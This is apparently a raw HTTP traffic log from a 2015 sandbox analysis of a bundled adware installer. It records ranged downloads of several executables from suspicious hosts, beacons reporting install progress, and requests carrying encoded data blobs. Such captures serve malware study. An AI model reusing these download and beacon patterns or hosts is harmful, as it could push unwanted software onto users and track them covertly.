GET /utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=15000&rnd=20529 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:32 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15890&rnd=20529 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:32 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /web/gf/all/setup.exe_b HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433372"
Last-Modified: Thu, 13 Aug 2015 02:36:12 GMT
Cache-Control: max-age=1268
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop002.am4.t,1439464765.cds045.am4.c

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 0-249999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 500000-749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1000000-1249999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1500000-1749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2500000-2749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3000000-3249999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3500000-3749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4000000-4249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4000000-4249999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4500000-4749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4500000-4749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5000000-5249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5000000-5249999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5500000-5749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5500000-5749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=6000000-6249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6000000-6249999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=6500000-6749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6500000-6749999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=7000000-7202622
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 202623
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 7000000-7202622/7202623

<<< skipped >>>

GET /utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15&rnd=18514 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2659
Content-Range: bytes 0-249999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BdcwCMFlx5QA9JTR--N2UUTZpBkKkTqrwPn686wRbwFnAfwjlAkZkQ==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2660
Content-Range: bytes 500000-749999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: XbTBKrHFJzqt0ok0gsNd8DHnkAX9Lv-UUMpN4rMyYDJ5B8RGkg-Nkg==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 1000000-1249999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: N1rla0s24OSj29nRmoKskxkRCFGx9urbQCV4GMyD7h9yhfWj4qmayQ==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 1
Content-Range: bytes 1750000-1999999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tVuwUmXRxaRx0tv3_k-KHoMv7M8uzxEVEpUEjNsAuwoB5JT7to6hDA==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=2500000-2707719
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 207720
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:30 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 1
Content-Range: bytes 2500000-2707719/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pko1q5w9D-ZrV1f7lhkGzuvIYfTs_B6vuxhy-XYb5q-gC3-p0YarDg==

<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=19871 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=25343 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=25343 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:30 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /spdbt/shoppy/snsch7.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439448710"
Last-Modified: Thu, 13 Aug 2015 06:51:50 GMT
Cache-Control: max-age=2163
Content-Length: 220160
Content-Range: bytes 0-220159/220160
Content-Type: application/x-msdownload
X-HW: 1439464705.dop001.am4.t,1439464704.cds037.am4.c
Content-Disposition: attachment; filename="snsch7.exe"

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2659
Content-Range: bytes 250000-499999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: mAni8NjowoEZ4hzwNBBLLJMsnU9NKs3Qt2RVASXHdvqrrfOSDu6TIg==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 750000-999999/2707720
Age: 2661
X-Cache: Hit from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pfKTDhlvaEezHBNdpLuQ1pjf0RS-1fa2LUz9JIrCztBi5MyXoX8osA==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 1250000-1499999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6YRxe_E5uSwU6jigoh9_7Rgw7i8iS-0F_5YkJEcDFbAPBEZI1vvd8g==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 1
Content-Range: bytes 1500000-1749999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fM8-9_Zp-lMVZh-thqJ2AoewTKBr4ueYzwm1yM6fQNjqx2MIHW-bEQ==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:30 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 2000000-2249999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ne48J9ysfGGXnlCnZHkqDxJWCJXb--qdfkpq8YScM4-g8AuZTiyweg==

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:31 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 2250000-2499999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bp2d0ni5N30PQ3U0WJzQTi9SsvPumVQ5QkVF8nQaMC5vZupHTJHFWg==

<<< skipped >>>

GET /15359.ashx?e=eFCD8T/coiezrE/yDXLQyd5jOExRmJjcfsQaZZXSd Q2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7 SOxGOFR1rQ7/gCVcfJT7Zd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywgBPaL3foawtkjneDvF7aJsyFrdg9Bz4vxjVxaO/jmdPBGRotN0ABYeEjtD/tYznR 0LhpxXD4t4eCmOKii sWrz7yH4dpDjMWLUJGnTsXhlEK5u6pECdO1SxiNrRjAGZBB5aSy JFSFglNuW4n71dQey68r 4NN8VyKsbjLeBp4dMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEEB2Ep7ddBI2V0TFaJ4cExkLJWSC3b0K eCko9DIyNsADn6EXOLggZKypkVJN3kXvFA4InH5qGL6TgskKX3SgwYohnxsdae b8EiI8s6T8qHsyKop7n4S NokPwegfs5DA6y2ObHsF4aVuJuMr 09WnXl3jXxrL4WWiPc6F0Foo3zqD0Un5LpMl6Vac8KKMKQ dvxgza/aJvlagtVicvngwklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /spdbt/shoppy/snsch7.exe_c HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache




<<< skipped >>>

GET /web/gf/all/setup.exe_e HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433380"
Last-Modified: Thu, 13 Aug 2015 02:36:20 GMT
Cache-Control: max-age=1267
Content-Length: 2124003
Content-Type: text/plain
X-HW: 1439464766.dop001.am4.t,1439464765.cds059.am4.c

<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=16011 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:22 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close


GET /utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1439464835 HTTP/1.1
Host: errors.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: zFkE2G5dLXckit3dWVOUUPCrHtTTqx9SNfpDp9uFnqvMUqNdLXmthXBEayzgXzkI
x-amz-request-id: 6F05CAF9012E6CE7
Date: Thu, 13 Aug 2015 11:19:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Sun, 02 Aug 2015 12:57:10 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..


GET /t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: yk9s88xsxo-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....



GET /t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: yk9s88xsxo-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
